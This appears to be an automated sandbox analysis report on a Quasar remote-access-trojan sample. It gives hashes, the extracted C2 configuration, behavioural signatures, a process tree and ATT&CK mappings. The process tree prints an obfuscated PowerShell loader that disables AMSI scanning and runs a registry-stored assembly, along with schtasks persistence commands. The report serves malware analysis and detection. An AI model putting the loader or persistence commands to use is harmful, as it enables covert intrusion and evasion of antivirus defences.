Analysis

  • max time kernel
    150s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-05-2024 20:58

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 58 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1008
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{de1acce6-bed6-4a28-81a1-028d37f872fa}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4292
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:740
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:900
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
              1⤵
                PID:440
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                1⤵
                  PID:380
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:832
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1056
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2236
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:unlUwvFsGWEH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yAfDGrLeDPbWQb,[Parameter(Position=1)][Type]$aXhrmaqdqY)$QiCWHKlVkFX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+'D'+'e'+'l'+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('My'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+'d'+','+''+'A'+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+'s'+'s'+[Char](44)+''+[Char](65)+'ut'+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$QiCWHKlVkFX.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+'c'+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+''+'i'+'g,P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yAfDGrLeDPbWQb).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$QiCWHKlVkFX.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+'r'+''+'t'+''+'u'+'a'+[Char](108)+'',$aXhrmaqdqY,$yAfDGrLeDPbWQb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+'d');Write-Output $QiCWHKlVkFX.CreateType();}$LTjPbpQDOhakB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+[Char](105)+'c'+'r'+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+[Char](46)+''+'W'+''+'i'+'n'+[Char](51)+''+[Char](50)+'.U'+'n'+''+'s'+''+[Char](97)+'feN'+'a'+''+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$VAgvLSxPZWmIfG=$LTjPbpQDOhakB.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'ro'+'c'+''+[Char](65)+'d'+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uoaAjJDZPYqoLXamjRf=unlUwvFsGWEH @([String])([IntPtr]);$mgjjfjqjtviAAzxOvrpsxy=unlUwvFsGWEH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QGwNlMzGnAj=$LTjPbpQDOhakB.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+'a'+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'n'+'e'+'l3'+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$OvGrnqZOiytBIy=$VAgvLSxPZWmIfG.Invoke($Null,@([Object]$QGwNlMzGnAj,[Object]('Lo'+[Char](97)+'dLi'+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$cIdgFlxtLTqYEipIh=$VAgvLSxPZWmIfG.Invoke($Null,@([Object]$QGwNlMzGnAj,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$kBWEDgq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OvGrnqZOiytBIy,$uoaAjJDZPYqoLXamjRf).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$YMUvKkeSlVELwaMir=$VAgvLSxPZWmIfG.Invoke($Null,@([Object]$kBWEDgq,[Object](''+'A'+'m'+[Char](115)+''+'i'+'S'+[Char](99)+''+[Char](97)+'n'+'B'+''+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$QrFBXmTCkl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cIdgFlxtLTqYEipIh,$mgjjfjqjtviAAzxOvrpsxy).Invoke($YMUvKkeSlVELwaMir,[uint32]8,4,[ref]$QrFBXmTCkl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YMUvKkeSlVELwaMir,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cIdgFlxtLTqYEipIh,$mgjjfjqjtviAAzxOvrpsxy).Invoke($YMUvKkeSlVELwaMir,[uint32]8,0x20,[ref]$QrFBXmTCkl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3472
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                        1⤵
                          PID:1064
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1212
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1224
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                              1⤵
                                PID:1264
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                1⤵
                                  PID:1308
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                  1⤵
                                    PID:1388
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1452
                                      • c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:3024
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                        1⤵
                                          PID:1468
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                          1⤵
                                            PID:1520
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1568
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                              1⤵
                                                PID:1576
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1684
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                  1⤵
                                                    PID:1708
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1800
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1808
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                        1⤵
                                                          PID:1860
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                          1⤵
                                                            PID:1920
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1748
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2100
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                              1⤵
                                                                PID:2144
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                1⤵
                                                                  PID:2348
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                  1⤵
                                                                    PID:2364
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                    1⤵
                                                                      PID:2372
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                      1⤵
                                                                        PID:2432
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                        1⤵
                                                                          PID:2576
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2592
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                            1⤵
                                                                              PID:2616
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                              1⤵
                                                                                PID:2624
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                1⤵
                                                                                  PID:2696
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2916
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                    1⤵
                                                                                      PID:3040
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                      1⤵
                                                                                        PID:3292
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3412
                                                                                          • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                            2⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1900
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:3712
                                                                                            • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4228
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                4⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:1600
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2564
                                                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                              "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:1936
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3948
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                            1⤵
                                                                                              PID:3512
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                              1⤵
                                                                                                PID:4956
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:4780
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2872
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2704
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:4372
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:4812
                                                                                                    • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                      C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4152
                                                                                                      • C:\Windows\System32\InstallAgent.exe
                                                                                                        C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:5100
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                          1⤵
                                                                                                            PID:1500
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            1⤵
                                                                                                              PID:4332
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4912

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                            Execution

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Persistence

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Privilege Escalation

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Discovery

                                                                                                            Query Registry

                                                                                                            1
                                                                                                            T1012

                                                                                                            System Information Discovery

                                                                                                            1
                                                                                                            T1082

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                              Filesize

                                                                                                              162KB

                                                                                                              MD5

                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                              SHA1

                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                              SHA256

                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                              SHA512

                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                            • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                              Filesize

                                                                                                              409KB

                                                                                                              MD5

                                                                                                              a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                              SHA1

                                                                                                              3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                              SHA256

                                                                                                              43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                              SHA512

                                                                                                              458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                            • C:\Windows\Temp\__PSScriptPolicyTest_chi5ubfl.ipo.ps1
                                                                                                              Filesize

                                                                                                              1B

                                                                                                              MD5

                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                              SHA1

                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                              SHA256

                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                              SHA512

                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                            • memory/584-72-0x0000026C89950000-0x0000026C8997B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-73-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/584-66-0x0000026C89950000-0x0000026C8997B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-65-0x0000026C89950000-0x0000026C8997B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-64-0x0000026C89920000-0x0000026C89945000-memory.dmp
                                                                                                              Filesize

                                                                                                              148KB

                                                                                                            • memory/640-77-0x0000012A25690000-0x0000012A256BB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/640-83-0x0000012A25690000-0x0000012A256BB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/640-84-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/740-95-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/740-88-0x0000010EC5570000-0x0000010EC559B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/740-94-0x0000010EC5570000-0x0000010EC559B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/900-99-0x0000022515BE0000-0x0000022515C0B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/900-106-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/900-105-0x0000022515BE0000-0x0000022515C0B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/1008-110-0x00000268314A0000-0x00000268314CB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/1900-6-0x0000000006270000-0x0000000006282000-memory.dmp
                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/1900-5-0x0000000005770000-0x00000000057D6000-memory.dmp
                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/1900-20-0x0000000073B40000-0x000000007422E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/1900-7-0x0000000006660000-0x000000000669E000-memory.dmp
                                                                                                              Filesize

                                                                                                              248KB

                                                                                                            • memory/1900-0-0x0000000073B4E000-0x0000000073B4F000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/1900-1-0x0000000000D30000-0x0000000000D9C000-memory.dmp
                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/1900-2-0x0000000005C70000-0x000000000616E000-memory.dmp
                                                                                                              Filesize

                                                                                                              5.0MB

                                                                                                            • memory/1900-3-0x0000000005690000-0x0000000005722000-memory.dmp
                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/1900-4-0x0000000073B40000-0x000000007422E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/3472-49-0x00007FFC91130000-0x00007FFC911DE000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/3472-48-0x00007FFC93BC0000-0x00007FFC93D9B000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/3472-25-0x00000240668F0000-0x0000024066912000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/3472-28-0x0000024066AA0000-0x0000024066B16000-memory.dmp
                                                                                                              Filesize

                                                                                                              472KB

                                                                                                            • memory/3472-47-0x0000024066E20000-0x0000024066E4A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/4228-13-0x0000000073B40000-0x000000007422E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4228-683-0x0000000073B40000-0x000000007422E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4228-682-0x0000000073B40000-0x000000007422E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4228-14-0x0000000073B40000-0x000000007422E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4228-46-0x0000000006DD0000-0x0000000006DDA000-memory.dmp
                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/4292-60-0x00007FFC91130000-0x00007FFC911DE000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/4292-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4292-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4292-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4292-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4292-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4292-59-0x00007FFC93BC0000-0x00007FFC93D9B000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/4292-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB